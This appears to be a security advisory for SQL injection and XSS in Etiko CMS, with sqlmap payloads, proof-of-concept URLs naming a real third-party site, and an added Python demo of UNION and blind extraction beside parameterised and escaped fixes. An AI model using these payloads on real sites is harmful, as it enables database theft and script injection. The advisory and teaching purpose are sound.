Link: http://xforce.iss.net/xforce/xfdb/97030

Test method:

Warning: the following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

# SQL Injection & XSS on Etiko CMS.
# Risk: High
# CWE number: CWE-89, CWE-79
# Date: 13/10/2014
# Vendor: www.etikweb.com
# Version: All
# Author: Felipe "Renzi" Gabriel
# Contact: renzi@linuxmail.org
# Tested on: Windows 8 ; Chrome ; Sqlmap 1.0-dev-nongit-20140906
# Vulnerable Files: /index.php & /loja/index.php
# Exploits:
http://www.target.com/loja/index.php?page_id=19 [XSS] & [SQLi]
http://www.target.com/index.php?article_id=16 [SQLi] & [XSS]
# PoC:
http://www.centrovegetariano.org/loja/index.php?page_id=19
http://www.centrovegetariano.org/index.php?article_id=16

--- "SQLi using SQLMAP." ---

---
Place: GET
Parameter: page_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page_id=19" AND 3987=3987 AND "Tulh"="Tulh

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: page_id=-5362" UNION ALL SELECT NULL,NULL,CONCAT(0x7175616f71,0x467a784a6e62664d5a79,0x716b756271)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: page_id=19" AND SLEEP(5) AND "mntS"="mntS
---

---
Place: GET
Parameter: article_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: article_id=16" AND 8044=8044 AND "yKZe"="yKZe

    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: article_id=-2752" UNION ALL SELECT 60,60,60,60,60,60,CONCAT(0x7167687671,0x6d54706b774f4a6f667a,0x7172707a71),60,60,60#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: article_id=16" AND SLEEP(5) AND "MDwY"="MDwY
---

--- "XSS using HTML injection." ---

http://www.centrovegetariano.org/loja/index.php?page_id=19"><marquee>XSS</marquee>
http://www.centrovegetariano.org/index.php?article_id=16"><marquee>XSS</marquee>

# Thanks

What the sqlmap output tells a tester: every payload opens with a double quote and re-balances it with AND "xxxx"="xxxx (or a trailing # comment), so on both scripts the numeric GET parameter is interpolated unquoted-unescaped into a double-quoted MySQL string literal; the two scripts differ only in the UNION column count (3 for /loja/index.php, 10 for /index.php). The time-based payload (SLEEP(5)) works regardless of whether query output is shown, which is the check to repeat when the page does not reflect data. The XSS payloads use the same opening quote followed by > to break out of a double-quoted attribute in which the parameter is echoed back unescaped.

Recommendation:

Vendor patch: Etiko
-----
The vendor has not yet released a patch or upgrade. Users of this software are advised to monitor the vendor's homepage for the latest version: http://www.etikweb.com/
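The sqlmap output above implies a query that drops the GET parameter into a quoted MySQL string literal, and the XSS payload implies the same value is echoed into a double-quoted HTML attribute. The following Python is an added example written for this page, not Etiko's code or the advisory author's: it rebuilds that injection context against a constructed in-memory SQLite database (the `pages` and `users` tables, their columns and rows are invented) to show the UNION and boolean-based blind techniques the advisory reports actually working, with the parameterised query and attribute escaping beside them. Because SQLite does not treat double quotes as string delimiters the way MySQL does, the literal here is single-quoted and the payloads use `'` where the advisory uses `"`; the MySQL-only `SLEEP()` time-based technique is not reproduced.

```python
import html
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the CMS tables (not Etiko's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?)",
                     [(19, "Shop", "welcome"), (20, "Contact", "mail us")])
    conn.execute("CREATE TABLE users (login TEXT, pw TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return conn


def vulnerable_lookup(conn, page_id):
    """Assumed vulnerable pattern: the raw GET value is interpolated into a
    quoted string literal (single-quoted here because SQLite is used; the
    advisory's payloads close a double-quoted MySQL literal instead)."""
    sql = "SELECT title, body FROM pages WHERE id='%s'" % page_id
    return conn.execute(sql).fetchall()


def safe_lookup(conn, page_id):
    """Hardened form: the value is bound as a parameter, never parsed as SQL."""
    sql = "SELECT title, body FROM pages WHERE id=?"
    return conn.execute(sql, (page_id,)).fetchall()


def union_dump(conn):
    """Equivalent of sqlmap's UNION payload: an id that matches nothing so only
    the attacker-chosen rows come back. The trailing WHERE 'x'='x re-balances
    the quote the way AND "Tulh"="Tulh does in the advisory (instead of #)."""
    payload = "-1' UNION ALL SELECT login, pw FROM users WHERE 'x'='x"
    return vulnerable_lookup(conn, payload)


def oracle(conn, condition):
    """Boolean-based blind oracle: page 19 renders only when condition holds."""
    payload = "19' AND (%s) AND 'a'='a" % condition
    return len(vulnerable_lookup(conn, payload)) > 0


def blind_extract(conn, subquery, max_len=32):
    """Recover the scalar result of subquery one character at a time using
    nothing but the true/false page difference (sqlmap's boolean-based blind
    technique). substr() and char() exist in both SQLite and MySQL."""
    out = ""
    for pos in range(1, max_len + 1):
        hit = None
        for code in range(32, 127):
            cond = "substr((%s), %d, 1) = char(%d)" % (subquery, pos, code)
            if oracle(conn, cond):
                hit = chr(code)
                break
        if hit is None:      # substr() past the end returns '' -> no match
            break
        out += hit
    return out


def render_link_vulnerable(page_id):
    """Assumed reflection: the raw parameter is echoed into a double-quoted
    attribute, so the advisory's payload closes the attribute and the tag."""
    return '<a href="index.php?page_id=%s">page</a>' % page_id


def render_link_safe(page_id):
    """Hardened form: attribute-context escaping of quotes, angle brackets and &."""
    return '<a href="index.php?page_id=%s">page</a>' % html.escape(page_id, quote=True)


if __name__ == "__main__":
    db = make_db()
    print(union_dump(db))
    print(blind_extract(db, "SELECT pw FROM users LIMIT 1"))
    print(safe_lookup(db, "-1' UNION ALL SELECT login, pw FROM users WHERE 'x'='x"))
    print(render_link_vulnerable('19"><marquee>XSS</marquee>'))
    print(render_link_safe('19"><marquee>XSS</marquee>'))
```

Running it shows the UNION payload returning the invented admin row, the blind loop recovering the same password from nothing but page-present/page-absent, the bound-parameter lookup returning no rows for the identical payload, and `html.escape` neutralising the `"><marquee>` break-out. On a MySQL target the same loop would use `"` in place of `'`, and note that MySQL's default collation makes the `=` comparison case-insensitive, so `ORD()`/`ASCII()` comparisons are the usual choice there.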